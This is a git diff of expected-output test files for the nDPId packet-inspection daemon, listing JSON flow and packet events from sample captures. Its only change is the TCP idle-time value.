+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":111,"packets-processed":111,"total-skipped-flows":0,"total-l4-data-len":38586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1491813286913} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 111/111 diff --git a/test/results/sites.pcapng.out b/test/results/sites.pcapng.out index 91b842a11..42be06ba9 100644 --- a/test/results/sites.pcapng.out +++ b/test/results/sites.pcapng.out 
@@ -1,340 +1,340 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sites.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595957694169} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595957694169,"flow_last_seen":1595957694169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595957694169,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} -00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595957694169,"flow_last_seen":1595957694169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595957694169,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} 
+00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623221441867} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} +00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":35,"total-skipped-flows":0,"total-l4-data-len":9095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1623222051753} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
